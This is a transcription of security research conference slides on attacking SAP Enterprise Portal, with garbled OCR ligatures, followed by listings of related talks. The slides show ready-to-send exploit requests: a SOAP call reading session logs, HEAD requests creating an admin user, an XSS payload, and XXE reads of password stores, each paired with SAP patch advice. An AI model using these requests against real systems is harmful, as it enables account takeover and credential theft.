Invest in security to secure investments. Breaking SAP Portal. Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan
|
|
- Flora Montgomery
- 6 years ago
- Views:
Transcription
1 Invest in security to secure investments Breaking SAP Portal Alexander Polyakov CTO ERPScan Dmitry Chastuchin - Principal Researcher ERPScan
2 About ERPScan The only 360- degree SAP Security solu8on - ERPScan Security Monitoring Suite for SAP Leader by the number of acknowledgements from SAP ( 150+ ) 60+ presentahons key security conferences worldwide 25 Awards and nominahons Research team - 20 experts with experience in different areas of security Headquarters in Palo Alto (US) and Amsterdam (EU) 2
3 Agenda Say hello to SAP Portal Breaking Portal through SAP Services Breaking Portal through J2EE Engine Breaking Portal through Portal issues Conclusion 3
4 SAP The most popular business applica8on More than customers worldwide 74% of Forbes 500 run SAP 4
5 Meet sapscan.com hup://erpscan.com/wp- content/uploads/2012/06/sap- Security- in- figures- a- global- survey final.pdf 5
6 Say hello to Portal Point of web access to SAP systems Point of web access to other corporate systems Way for auackers to get access to SAP from the Internet ~17 Portals in Switzerland, according to Shodan ~11 Portals in Switzerland, according to Google 6
7 EP architecture 7
8 Okay, okay. SAP Portal is important, and it has many links to other modules. So what? 8
9 SAP Management Console 9
10 SAP Management Console SAP MC provides a common framework for centralized system management Allowing to see the trace and log messages Using JSESSIONID from logs, auacker can log into Portal What we can find into logs? Right! File userinterface.log contains calculated JSESIONID But auacker must have creden8al for reading log file! Wrong! 10
11 SAP Management Console <?xml version="1.0"?> <SOAP- ENV:Envelope xmlns:soap- ENV="hUp://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="hup:// instance" xmlns:xs="hup:// <SOAP- ENV:Header> <sapsess:session xmlns:sapsess="hup:// <enablesession>true</enablesession> </sapsess:session> </SOAP- ENV:Header> <SOAP- ENV:Body> <ns1:readlogfile xmlns:ns1="urn:sapcontrol"> <filename>j2ee/cluster/server0/log/system/userinterface.log</filename> <filter/> <language/> <maxentries>%count%</maxentries> <statecookie>eof</statecookie> </ns1:readlogfile> </SOAP- ENV:Body> </SOAP- ENV:Envelope> 11
12 PrevenHon Don t use TRACE_LEVEL = 3 in produc8on systems or delete traces Install notes and hup://help.sap.com/saphelp_nwpi71/helpdata/en/ d6/49543b1e49bc1fe a114084/frameset.htm 12
13 Single- Sign On 13
14 SSO (old but shll works) SAP implements SSO using the Header Variable Login Module creden8als cookie check okay header_auth AUacker cookie tnx Mariano ;) 14
15 PrevenHon Implement proper network filters to avoid direct connec8ons to SAP J2EE Engine. If you use it for Windows authen8ca8on, switch to SPNegoLoginModule hup://help.sap.com/saphelp_nw73ehp1/helpdata/en/d0/ a3d940c e a1550b0/frameset.htm 15
16 SAP NetWeaver J2EE 16
17 Access control DeclaraHve By WEB.XML ProgrammaHc By UME Web Dynpro Portal iviews J2EE Web apps - programma8c - programma8c - declara8ve 17
18 DeclaraHve access control The central en8ty in the J2EE authoriza8on model is the security role. Programmers define the applica8on- specific roles in the J2EE deployment descriptor web.xml web- j2ee- engine.xml 18
19 Verb Tampering 19
20 web.xml <servlet> <servlet- name>cri8calac8on</servlet- name> <servlet- class>com.sap.admin.cri8cal.ac8on</servlet- class> </servlet> <servlet- mapping> <servlet- name>cri8calac8on</</servlet- name> <url- pauern>/admin/cri8cal</url- pauern> </servlet- mapping <security- constraint> <web- resource- collec8on> <web- resource- name>restrictedaccess</web- resource- name> <url- pauern>/admin/*</url- pauern> <hup- method>get</hup- method> </web- resource- collec8on> <auth- constraint> <role- name>administrator</role- name> </auth- constraint> </security- constraint> 20
21 Verb Tampering If we are trying to get access to an applica8on using GET we need a login:pass and administrator role What if we try to get access to applica8on using HEAD instead GET? PROFIT! Did U know about ctc? 21
22 Verb Tampering Need Admin account in SAP Portal? Just send two HEAD requests Create new user blabla:blabla HEAD /ctc/configservlet?param=com.sap.ctc.u8l.userconfig;createuser;username=blabla,password=blabla Add user blabla to group Administrators HEAD /ctc/configservlet?param=com.sap.ctc.u8l.userconfig;add_user_to_group;username=blabla,groupname=administrators Works when UME uses JAVA database 22
23 PrevenHon Install SAP notes , Install other SAP notes about Verb Tampering Scan applica8ons with ERPScan WEB.XML checker Disable the applica8ons that are not necessary 23
24 Invoker servlet 24
25 web.xml <servlet> <servlet- name>cri>calac>on</servlet- name> <servlet- class>com.sap.admin.cri>cal.ac>on</servlet- class> </servlet> <servlet- mapping> <servlet- name>cri>calac>on</</servlet- name> <url- pabern>/admin/cri>cal</url- pabern> </servlet- mapping <security- constraint> <web- resource- collec>on> <web- resource- name>restrictedaccess</web- resource- name> <url- pabern>/admin/*</url- pabern> <hbp- method>get</hbp- method> <hbp- method>head</hbp- method> </web- resource- collec>on> <auth- constraint> <role- name>administrator</role- name> </auth- constraint> </security- constraint> GET /admin/cri8cal/cri>calac>on GET /servlet/com.sap.admin.cri8cal.ac8on 25
26 Invoker Servlet Want to execute an OS command on J2EE server remotely? Maybe upload a backdoor in a Java class? Or sniff all traffic? SHll remember ctc? 26
27 Invoker Servlet 27
28 PrevenHon Update to the latest patch , EnableInvokerServletGlobally must be false Check all WEB.XML files with ERPScan WEBXML checker 28
29 So, where is Portal? 29
30 SAP Portal User access rights to objects are in the Portal Content Directory (PCD) Based on ACL 2 types of access: (design 8me) for administrators (run8me) for users 30
31 Portal Permission Levels 31
32 End User permission The objects where end user permission is enabled affect the following areas in Portal: All Portal Catalog obj with end user permission Authorized Portal users may access restricted Portal components by URL if they are granted permission in the appropriate security zone. 32
33 Administrator permission Owner = full control + modify permissions Full control = read/write + delete obj Read/Write = read+write+edit proper8es+ add/rem child Write (folders only) = create objects Read = view obj+create instances (delta links and copies) None = access not granted 33
34 Role Assigner permission The Role Assigner permission seyng is available for role objects It allows you to determine which Portal users are permiued to assign other users, groups, or roles to the role principle using the Role Assignment tool 34
35 Security Zones Security zones allow the system administrator to control which Portal components and Portal services a Portal user can launch A security zone specifies the vendor ID, the security area, and safety level for each Portal component and Portal service Why? To group mul>ple iviews easily like files in directories 35
36 Security Zones The security zone is defined in a Portal applica8on descriptor XML file portalapps.xml A Portal component or service can only belong to one security zone Zones allows the administrator to assign permissions to a safety level, instead of assigning them directly Why? To group mul>ple iviews easily like files in directories 36
37 We can get access to Portal iviews using direct URL: /irj/servlet/prt/portal/prtroot/<iview_id> And only Security Zone rights will be checked 37
38 Security Zones So, SecZones offer an extra, but op8onal, layer of code- level security to iviews User- > check end user permission to the role- > view iview User- > check end user permission to the role- > check end user permission to the SecZone - > view iview By default, this func8onality is disabled 38
39 So I wonder how many Portal applica8ons with No\Low Safety exist? 39
40 Safety Levels for Security Zone No Safety Anonymous users are permiued to access portal components defined in the security zone. Low Safety A user must be at least an authen8cated portal user to access portal components defined in the security zone. Medium Safety A user must be assigned to a par8cular portal role that is authorized to access portal components defined in the security zone High Safety A user must be assigned to a portal role with higher administra8ve rights that is authorized to access portal components defined in the security zone. 40
41 Zones with no safety Many custom applica8ons with low security level zone 41
42 PrevenHon Check security zones permissions hup://help.sap.com/saphelp_nw70/helpdata/en/25/85de55a94c4b5fa7a2d74e8ed201b0/frameset.htm hup://help.sap.com/saphelp_nw70/helpdata/en/f6/2604db05fd11d7b c9f7/frameset.htm 42
43 SAP Portal Web based services All OWASP TOP10 actual XSS Phishing Traversal XXE 43
44 EPCF 44
45 XSS Many XSSs in Portal But some8mes huponly But when we exploit XSS, we can use the features of SAP Portal 45
46 EPCF EPCF provides a JavaScript API designed for the client- side communica8on between portal components and the portal core framework Enterprise Portal Client Manager (EPCM) iviews can access the EPCM object from every portal page or IFrame Every iview contains the EPCM object For example, EPCF used for transient user data buffer for iviews <SCRIPT> alert(epcm.loadclientdata("urn:com.sap.myobjects", "person"); </SCRIPT> 46
47 PrevenHon Install SAP note
48 KM Phishing SAP Knowledge Management may be used to create phishing pages 48
49 FIX 49
50 Directory traversal 50
51 Directory traversal fix bypass 51
52 PrevenHon Install SAP note
53 Cut the Crap, Show Me the Hack 53
54 Breaking SAP Portal Found a file in the OS of SAP Portal with the encrypted passwords for administra8on and DB Found a file in the OS of SAP Portal with keys to decrypt passwords Found a vulnerability (another one ;)) which allows reading the files with passwords and keys Decrypt passwords and log into Portal PROFIT! 54
55 Read file How we can read the file? Directory Traversal OS Command execute XML External En8ty (XXE) 55
56 XXE in Portal 56
57 XXE in Portal 57
58 XXE Error based XXE 58
59 Breaking SAP Portal Ok, we can read files Where are the passwords? The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here: \usr\sap\<sid>\sys\global\security\data\secstore.proper>es 59
60 Where are the passwords? (config.proper4es) rdbms.maximum_connec8ons=5 system.name=ttt secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/ SecStore.key secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/ SecStore.proper8es secstorefs.lib=/oracle/tttsapmnt/global/security/lib rdbms.driverloca8on=/oracle/client/10x_64/instantclient/ ojdbc14.jar rdbms.connec8on=jdbc/pool/ttt rdbms.ini8al_connec8ons=1 60
61 Where are the passwords? (config.proper4es) rdbms.maximum_connec8ons=5 system.name=ttt secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/secstore.key secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/secstore.proper8es secstorefs.lib=/oracle/tttsapmnt/global/security/lib rdbms.driverloca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/ttt rdbms.ini8al_connec8ons=1 61
62 But where is the key? 62
63 SecStore.properHes $internal/version=ni4zff4wmseaseforccmxegafx admin/host/ttt=7kjuopps/+u +14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS admin/password/ttt=7kjuopps/+uv+14j56vdc7m7v7dytbgbkgqdp +QD04b0Fh jdbc/pool/ttt=7kjuopps/+u5jm6s1cvvgq1gzfvarxuuzejthtji0vgegh admin/port/ttt=7kjuopps/+u+1j4vd1cv6ztvd336rzed7267rwr4zugrtq $internal/check=bjrrz eua+bw4xczdz16zx78u t $internal/mode=encrypted admin/user/ttt=7kjuopps/+u +14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E 63
64 config.properhes rdbms.maximum_connec8ons=5 system.name=ttt secstorefs.keyfile=/oracle/ttt/sapmnt/global/security/data/secstore.key secstorefs.secfile=/oracle/ttt/sapmnt/global/security/data/secstore.proper8es secstorefs.lib=/oracle/tttsapmnt/global/security/lib rdbms.driverloca8on=/oracle/client/10x_64/instantclient/ojdbc14.jar rdbms.connec8on=jdbc/pool/ttt rdbms.ini8al_connec8ons=1 64
65 Get the password We have an encrypted password We have a key to decrypt it We got the J2EE admin and JDBC login:password! 65
66 PrevenHon Install SAP note Restrict read access to files SecStore.proper>es and SecStore.key 66
67 Portal post exploitahon Lot of links to other systems in corporate LAN Using SSRF, auackers can get access to these systems What is SSRF? 67
68 SSRF History: Basics We send Packet A to Service A Service A ini8ates Packet B to service B Services can be on the same or different hosts We can manipulate some fields of packet B within packet A Various SSRF auacks depend on how many fields we can control on packet B Packet A Packet B 68
69 ParHal Remote SSRF: HTTP afacks on other services Direct auack GET /vuln.jsp Corporate network HTTP Server SSRF AUack Get /vuln.jst SSRF AUack A B 69
70 Gopher uri scheme Using gopher:// uri scheme, it is possible to send TCP packets Exploit OS vulnerabili8es Exploit old SAP applicahon vulnerabilihes Bypass SAP security restric8ons Exploit vulnerabili8es in local services More info in our BH2012 presenta8on: SSRF vs. Business Cri>cal Applica>ons hup://erpscan.com/wp- content/uploads/2012/08/ssrf- vs- Businness- cri8cal- applica8ons- whitepaper.pdf 70
71 Portal post- exploitahon 71
72 Conclusion It is possible to protect yourself from these kinds of issues, and we are working close with SAP to keep customers secure SAP Guides Regular security assessments Monitoring technical security ABAP code review SegregaHon of DuHes It s all in your hands 72
73 Future work Many of the researched issues cannot be disclosed now because of our good rela>onship with SAP Product Security Response Team, whom I would like to thank for coopera>on. However, if you want to be the first to see new abacks and demos, follow us and abend future presenta>ons: December 6 BlackHat (UAE, Abu Dhabi) December 13 Syscan 360 (Beijing, China) 73
74 Web: e- mail: @_chipik 74
Invest in security to secure investments. Breaking SAP Portal Dmitry Chastuchin Principal Researcher ERPScan
Invest in security to secure investments Breaking SAP Portal Dmitry Chastuchin Principal Researcher ERPScan Dmitry Chastuhin Yet another security researcher Business application security expert ERPScan
More informationSAP Portal: Hacking and forensics Dmitry Chastukhin Director of SAP pentest/research team Evgeny Neyolov Security analyst, (anti)forensics research
Invest in security to secure investments SAP Portal: Hacking and forensics Dmitry Chastukhin Director of SAP pentest/research team Evgeny Neyolov Security analyst, (anti)forensics research ERPScan Developing
More informationArchitecture Figure 3.
The popularity of SAP EP and its availability on the Internet makes it a desirable entry point for hackers who are choosing the spot to attack companies of various size and industry. Let s take a look
More informationEAS- SEC: Framework for Securing Enterprise Business Applica;ons
Invest in security to secure investments EAS- SEC: Framework for Securing Enterprise Business Applica;ons Alexander Polyakov CTO ERPScan About ERPScan The only 360- degree SAP Security solu8on - ERPScan
More informationAlexander Polyakov. CTO at ERPScan
Invest in security to secure investments Top 10 most interes.ng SAP vulnerabili.es and a9acks + bonus Alexander Polyakov. CTO at ERPScan 1 About ERPScan The only 360- degree SAP Security solu8on - ERPScan
More informationSAP, dos, dos, race conditions => rce. Dmitry Chastuhin, Dmitry Yudin
SAP, dos, dos, race conditions => rce Dmitry Chastuhin, Dmitry Yudin 1 About us Yet another security researcher Business application security expert ERPScan Wiem, jak korzystać z tłumaczami 2 About us
More informationA crushing blow at the heart of SAP s J2EE Engine.
Invest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Alexander Polyakov CTO ERPScan Me CTO of the ERPScan company Head of DSecRG (research subdivision) Architect
More informationInvest in security to secure investments Oracle PeopleSo, applica.ons are under a3acks!
Invest in security to secure investments Oracle PeopleSo, applica.ons are under a3acks! Alexey Tyurin About ERPScan The only 360- degree SAP Security solu9on - ERPScan Security Monitoring Suite for SAP
More informationInvest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Version 1.1
Invest in security to secure investments A crushing blow at the heart of SAP s J2EE Engine. Version 1.1 Alexander Polyakov, Dmitriy Chastuhin ERPScan Me CTO of the ERPScan company Head of DSecRG (research
More informationSAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0
Welcome BIZEC Roundtable @ IT Defense, Berlin SAP Security BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0 February 1, 2013 Andreas Wiegenstein CTO, Virtual Forge 2 SAP Security SAP security is a complex
More informationJulia Levedag, Vera Gutbrod RIG and Product Management SAP AG
Setting Up Portal Roles in SAP Enterprise Portal 6.0 Julia Levedag, Vera Gutbrod RIG and Product Management SAP AG Learning Objectives As a result of this workshop, you will be able to: Understand the
More informationA GLOBAL SURVEY Authors:
SAP SECURITY IN FIGURES: A GLOBAL SURVEY 2007 2013 Authors: Alexander Polyakov Alexey Tyurin Other contributors: Kirill Nikitenkov Evgeny Neyolov Alina Oprisko Dmitry Shimansky A GLOBAL SURVEY 2007 2013
More informationDominic Yow-Sin-Cheung SAP GRC Regional Implementation Group (RIG) elearning Series Part 5 of 5
SAP BusinessObjects Risk Management & Process Control 3.0 Post-Installation Tasks Java Dominic Yow-Sin-Cheung SAP GRC Regional Implementation Group (RIG) elearning Series Part 5 of 5 Document Header Applies
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationSSRF VS. BUSINESS- CRITICAL
SSRF VS. BUSINESS- CRITICAL APPLICATIONS. PART 1: XXE TUNNELING IN SAP NETWEAVER Authors: Alexander Polyakov Dmitry Chastukhin Alexey Tyurin Content Important notes... 4 Intro... 5 Introduction to Business
More informationCare & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers. Sunny Wear OWASP Tampa Chapter December
Care & Feeding of Programmers: Addressing App Sec Gaps using HTTP Headers Sunny Wear OWASP Tampa Chapter December Mee@ng 1 About the Speaker Informa@on Security Architect Areas of exper@se: Applica@on,
More informationWeb Application Penetration Testing
Web Application Penetration Testing COURSE BROCHURE & SYLLABUS Course Overview Web Application penetration Testing (WAPT) is the Security testing techniques for vulnerabilities or security holes in corporate
More informationAttacks to SAP. Web Applications Your crown jewels online. Mariano Nuñez Di Croce. DeepSec, Austria. November 18th,
Attacks to SAP Web Applications Your crown jewels online Mariano Nuñez Di Croce mnunez@onapsis.com November 18th, 2011 DeepSec, Austria Disclaimer This publication is copyright 2011 Onapsis SRL All rights
More informationLayer Seven Security ADVISORY. SAP Security Notes
Layer Seven Security ADVISORY SAP Security Notes August 2017 Note 2381071 patches a critical cross-site Ajax vulnerability in the Prototype JS library of BusinessObjects. Ajax is a method often used by
More informationPainless Applica,on Security. Les Hazlewood Apache Shiro Project Chair CTO, Kataso5 Inc / CloudDirectory
Painless Applica,on Security Les Hazlewood Apache Shiro Project Chair CTO, Kataso5 Inc / CloudDirectory What is Apache Shiro? Applica>on security framework ASF TLP - hfp://shiro.apache.org Quick and Easy
More informationIn The Middle of Printers The (In)Security of Pull Prin8ng Solu8ons. Jakub Kałużny. SecuRing
In The Middle of Printers The (In)Security of Pull Prin8ng Solu8ons Jakub Kałużny SecuRing #whoami IT Security Consultant at SecuRing Consul8ng all phases of SDLC Previously worked for ESA and online money
More informationEAS- SEC: Framework for Securing Enterprise Business ApplicaCons
SAP in Internet EAS- SEC: Framework for Securing Enterprise Business ApplicaCons Alexander Polyakov CTO ERPScan erpscan.com ERPScan invest in security to secure investments 1 SAP in Internet erpscan.com
More informationDifferent Types of iviews in Enterprise Portal 7.0
Different Types of iviews in Enterprise Portal 7.0 Applies to: This Article applies to Enterprise Portal 7.0. For more information, visit the Portal and Collaboration homepage. Summary This document covers
More informationThe Way of the Bounty. by David Sopas
The Way of the Bounty by David Sopas (@dsopas) ./whoami Security Consultant for Checkmarx Security Team Leader for Char49 Disclosed more than 50 security advisories Founder of WebSegura.net Love to hack
More informationUnderstanding Perimeter Security
Understanding Perimeter Security In Amazon Web Services Aaron C. Newman Founder, CloudCheckr Aaron.Newman@CloudCheckr.com Changing Your Perspective How do I securing my business applications in AWS? Moving
More informationApplication Security through a Hacker s Eyes James Walden Northern Kentucky University
Application Security through a Hacker s Eyes James Walden Northern Kentucky University waldenj@nku.edu Why Do Hackers Target Web Apps? Attack Surface A system s attack surface consists of all of the ways
More informationSecuring ArcGIS for Server. David Cordes, Raj Padmanabhan
Securing ArcGIS for Server David Cordes, Raj Padmanabhan Agenda Security in the context of ArcGIS for Server User and Role Considerations Identity Stores Authentication Securing web services Protecting
More informationSolutions Business Manager Web Application Security Assessment
White Paper Solutions Business Manager Solutions Business Manager 11.3.1 Web Application Security Assessment Table of Contents Micro Focus Takes Security Seriously... 1 Solutions Business Manager Security
More informationOracle ADF 11gR2 Development Beginner's Guide
Oracle ADF 11gR2 Development Beginner's Guide Vinod Krishnan Chapter No.10 "Deploying the ADF Application" In this package, you will find: A Biography of the author of the book A preview chapter from the
More informationSecuring ArcGIS Services
Federal GIS Conference 2014 February 10 11, 2014 Washington DC Securing ArcGIS Services James Cardona Agenda Security in the context of ArcGIS for Server Background concepts Access Securing web services
More informationTop 10 Web Application Vulnerabilities
Top 10 Web Application Vulnerabilities Why you should care about them plus a live hacking demo!! Why should you care?! Insecure so*ware is undermining our financial, healthcare, defense, energy, and other
More informationT H E P H A N T O M S E C U R I T Y. By Vahagn Vardanyan and Vladimir Egorov
T H E P H A N T O M S E C U R I T Y By Vahagn Vardanyan and Vladimir Egorov Vahagn Vardanyan Master jedy Senior security researcher at ERPScan. Bug hunter, malware and vulnerability researcher for over
More informationINJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING
INJECTING SECURITY INTO WEB APPS WITH RUNTIME PATCHING AND CONTEXT LEARNING AJIN ABRAHAM SECURITY ENGINEER #WHOAMI Security Engineering @ Research on Runtime Application Self Defence Authored MobSF, Xenotix
More informationApplication security : going quicker
Application security : going quicker The web application firewall example Agenda Agenda o Intro o Application security o The dev team approach o The infra team approach o Impact of the agility o The WAF
More informationHow were the Credit Card Numbers Published on the Web? February 19, 2004
How were the Credit Card Numbers Published on the Web? February 19, 2004 Agenda Security holes? what holes? Should I worry? How can I asses my exposure? and how can I fix that? Q & A Reference: Resources
More informationWhy bother? Causes of data breaches OWASP. Top ten attacks. Now what? Do it yourself Questions?
Jeroen van Beek 1 Why bother? Causes of data breaches OWASP Top ten attacks Now what? Do it yourself Questions? 2 In many cases the web application stores: Credit card details Personal information Passwords
More informationUnraveling the Mysteries of J2EE Web Application Communications
Unraveling the Mysteries of J2EE Web Application Communications An HTTP Primer Peter Koletzke Technical Director & Principal Instructor Common Problem What we ve got here is failure to commun cate. Captain,
More informationAbout the company. What we do? Cybersecurity solutions adapted to protect enterprise business applications (SAP & Oracle).
About the company 2 What we do? Cybersecurity solutions adapted to protect enterprise business applications (SAP & Oracle). Agenda 3 Building a business case for SAP Vulnerability Management How to start
More informationLecture Overview. IN5290 Ethical Hacking. Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing
Lecture Overview IN5290 Ethical Hacking Lecture 4: Web hacking 1, Client side bypass, Tampering data, Brute-forcing Summary - how web sites work HTTP protocol Client side server side actions Accessing
More informationInvest in security to secure investments. Implemen'ng SAP security in 5 steps. Alexander Polyakov. CTO, ERPScan
Invest in security to secure investments Implemen'ng SAP security in 5 steps Alexander Polyakov. CTO, ERPScan About ERPScan The only 360- degree SAP security solu'on: ERPScan Security Monitoring Suite
More informationAWS Iden)ty And Access Management (IAM) Manohar Rapolu
AWS Iden)ty And Access Management (IAM) Manohar Rapolu Topics Introduc5on Principals Authen5ca5on Authoriza5on Other Key Feature -> Mul5 Factor Authen5ca5on -> Rota5ng Keys -> Resolving Mul5ple Permissions
More informationHow to read security test report?
How to read security test report? Ainārs Galvāns Security Tester Exigen Services Latvia www.exigenservices.lv Defini@ons (wikipedia) Term Threat Vulnerability Informa@on assurance Defini+on A threat is
More informationIdentity Provider for SAP Single Sign-On and SAP Identity Management
Implementation Guide Document Version: 1.0 2017-05-15 PUBLIC Identity Provider for SAP Single Sign-On and SAP Identity Management Content 1....4 1.1 What is SAML 2.0.... 5 SSO with SAML 2.0.... 6 SLO with
More information(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection
Pattern Recognition and Applications Lab (System) Integrity attacks System Abuse, Malicious File upload, SQL Injection Igino Corona igino.corona (at) diee.unica.it Computer Security April 9, 2018 Department
More informationSetting Up an Environment for Testing Applications in a Federated Portal Network
SAP NetWeaver How-To Guide Setting Up an Environment for Testing Applications in a Federated Portal Network Applicable Releases: SAP NetWeaver 7.0 IT Practice: User Productivity Enablement IT Scenario:
More informationArcGIS Server and Portal for ArcGIS An Introduction to Security
ArcGIS Server and Portal for ArcGIS An Introduction to Security Jeff Smith & Derek Law July 21, 2015 Agenda Strongly Recommend: Knowledge of ArcGIS Server and Portal for ArcGIS Security in the context
More informationOWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati
OWASP TOP 10 2017 Release Andy Willingham June 12, 2018 OWASP Cincinnati Agenda A quick history lesson The Top 10(s) Web Mobile Privacy Protective Controls Why have a Top 10? Software runs the world (infrastructure,
More informationConfiguring Anonymous Access to Analysis Files in TIBCO Spotfire 7.5
Configuring Anonymous Access to Analysis Files in TIBCO Spotfire 7.5 Introduction Use Cases for Anonymous Authentication Anonymous Authentication in TIBCO Spotfire 7.5 Enabling Anonymous Authentication
More information1 About Web Security. What is application security? So what can happen? see [?]
1 About Web Security What is application security? see [?] So what can happen? 1 taken from [?] first half of 2013 Let s focus on application security risks Risk = vulnerability + impact New App: http://www-03.ibm.com/security/xforce/xfisi
More informationAppSpider Enterprise. Getting Started Guide
AppSpider Enterprise Getting Started Guide Contents Contents 2 About AppSpider Enterprise 4 Getting Started (System Administrator) 5 Login 5 Client 6 Add Client 7 Cloud Engines 8 Scanner Groups 8 Account
More informationLayer Seven Security ADVISORY
Layer Seven Security ADVISORY SAP Security Notes July 01 In July, SAP released a crucial update for a vulnerability in the Archiving Workbench originally patched in February 011. Note 1561545 contains
More informationSession 8. Reading and Reference. en.wikipedia.org/wiki/list_of_http_headers. en.wikipedia.org/wiki/http_status_codes
Session 8 Deployment Descriptor 1 Reading Reading and Reference en.wikipedia.org/wiki/http Reference http headers en.wikipedia.org/wiki/list_of_http_headers http status codes en.wikipedia.org/wiki/_status_codes
More informationHacking Web Sites OWASP Top 10
Hacking Web Sites OWASP Top 10 Emmanuel Benoist Spring Term 2018 Berner Fachhochschule Haute cole spcialise bernoise Berne University of Applied Sciences 1 Web Security: Overview of other security risks
More informationCon$nuous Integra$on Development Environment. Kovács Gábor
Con$nuous Integra$on Development Environment Kovács Gábor kovacsg@tmit.bme.hu Before we start anything Select a language Set up conven$ons Select development tools Set up development environment Set up
More informationHow the Cloud is Changing Federated Iden4ty Requirements. Patrick Harding CTO, Ping March 1, 2010
How the Cloud is Changing Federated Iden4ty Requirements Patrick Harding CTO, Ping Iden3ty @pingcto March 1, 2010 http://www.flickr.com/photos/quinnanya/2690873096/ The Return of Timesharing http://www.flickr.com/photos/quinnanya/2690873096/
More informationPracticeDump. Free Practice Dumps - Unlimited Free Access of practice exam
PracticeDump http://www.practicedump.com Free Practice Dumps - Unlimited Free Access of practice exam Exam : SY0-501 Title : CompTIA Security+ Certification Exam Vendor : CompTIA Version : DEMO Get Latest
More informationMobile Malfeasance. Exploring Dangerous Mobile Code. Jason Haddix, Director of Penetration Testing
Mobile Malfeasance Exploring Dangerous Mobile Code Jason Haddix, Director of Penetration Testing Copyright 2012 Hewlett-Packard Development Company, L.P. The information contained herein is subject to
More informationIntroduction to application management
Introduction to application management To deploy web and mobile applications, add the application from the Centrify App Catalog, modify the application settings, and assign roles to the application to
More informationAdministering Jive Mobile Apps for ios and Android
Administering Jive Mobile Apps for ios and Android TOC 2 Contents Administering Jive Mobile Apps...3 Configuring Jive for Android and ios...3 Custom App Wrapping for ios...3 Authentication with Mobile
More informationIntegrating Web Dynpro Applications into SAP Enterprise Portal. Dr.-Ing. Oliver Stiefbold Product Management, SAP AG
Integrating Web Dynpro Applications into SAP Enterprise Portal Dr.-Ing. Oliver Stiefbold Product Management, SAP AG Agenda Integrating Web Dynpro into SAP Enterprise Portal: Unified Rendering Portal Themes
More information16th Annual Karnataka Conference
16th Annual Karnataka Conference GRC Compliance to Culture JULY 19 & 20, 2013 Topic OWASP Top 10 An Overview Speakers Akash Mahajan & Tamaghna Basu OWASP Top 10 An Overview The Open Web Application Security
More informationRKN 2015 Application Layer Short Summary
RKN 2015 Application Layer Short Summary HTTP standard version now: 1.1 (former 1.0 HTTP /2.0 in draft form, already used HTTP Requests Headers and body counterpart: answer Safe methods (requests): GET,
More informationAbout ERPScan. ERPScan and Oracle. ERPScan researchers were acknowledged 20+ times during quarterly Oracle patch updates since 2008
1 2 About ERPScan 3 ERPScan and Oracle ERPScan researchers were acknowledged 20+ times during quarterly Oracle patch updates since 2008 Totally 100+ Vulnerabilities closed in Oracle Applications o Oracle
More informationImplementing Security for ArcGIS Server Java Solutions
Implementing Security for ArcGIS Server Java Solutions Shreyas Shinde Jay Theodore ESRI Developer Summit 2008 1 Schedule 75 minute session 60 65 minute lecture 10 15 minutes Q & A following the lecture
More informationSCALE 15x (c) 2017 Ty Shipman
Please view my linked-in page (under See more) to get a copy of this presenta
More informationExecutive Summary. Flex Bounty Program Overview. Bugcrowd Inc Page 2 of 7
CANVAS by Instructure Bugcrowd Flex Program Results December 01 Executive Summary Bugcrowd Inc was engaged by Instructure to perform a Flex Bounty program, commonly known as a crowdsourced penetration
More informationSAP Enterprise. Portal
SAP Enterprise Portal What is an Enterprise Portal? To answer this question, one must first ask what problem an enterprise portal is intended to solve. In the age of e-business, many companies are turning
More informationDon t blink or how to create secure software. Bozhidar Bozhanov, LogSentinel
Don t blink or how to create secure software Bozhidar Bozhanov, CEO @ LogSentinel About me Senior software engineer and architect Founder & CEO @ LogSentinel Former IT and e-gov advisor to the deputy prime
More informationWeb Pen Tes)ng. Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012
Web Pen Tes)ng Michael Hicks CMSC 498L, Fall 2012 Part 2 slides due to Eric Eames, Lead Penetra)on Tester, SAIC, March 2012 Exploi)ng Vulnerabili)es Code injec)on Cross site scrip)ng, SQL injec)on, (buffer
More informationRoadmap. How to implement GDPR in SAP?
Roadmap 2 How to implement GDPR in SAP? 1. Introduction to GDPR 2. GDPR security-related requirements 3. SAP security controls for GDPR 4. GDPR security implementation plan 5. Follow-up actions Introduction
More informationPortal for ArcGIS. Matthias Schenker, Esri Switzerland
Portal for ArcGIS Matthias Schenker, Esri Switzerland Empower people to use and create maps More apps Operations Dashboard for ArcGIS Collector for ArcGIS Maps everywhere Organize your maps and apps enable
More informationInvest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP
Invest in security to secure investments SSRF vs. Business- cri0cal applica0ons: XXE tunneling in SAP Alexander Polyakov CTO at ERPScan Dmitry Chastukhin Principal Researcher at ERPScan Please download
More informationProvide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any
OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing
More informationAspera Connect Windows XP, 2003, Vista, 2008, 7. Document Version: 1
Aspera Connect 2.6.3 Windows XP, 2003, Vista, 2008, 7 Document Version: 1 2 Contents Contents Introduction... 3 Setting Up... 4 Upgrading from a Previous Version...4 Installation... 4 Set Up Network Environment...
More informationTexSaw Penetration Te st in g
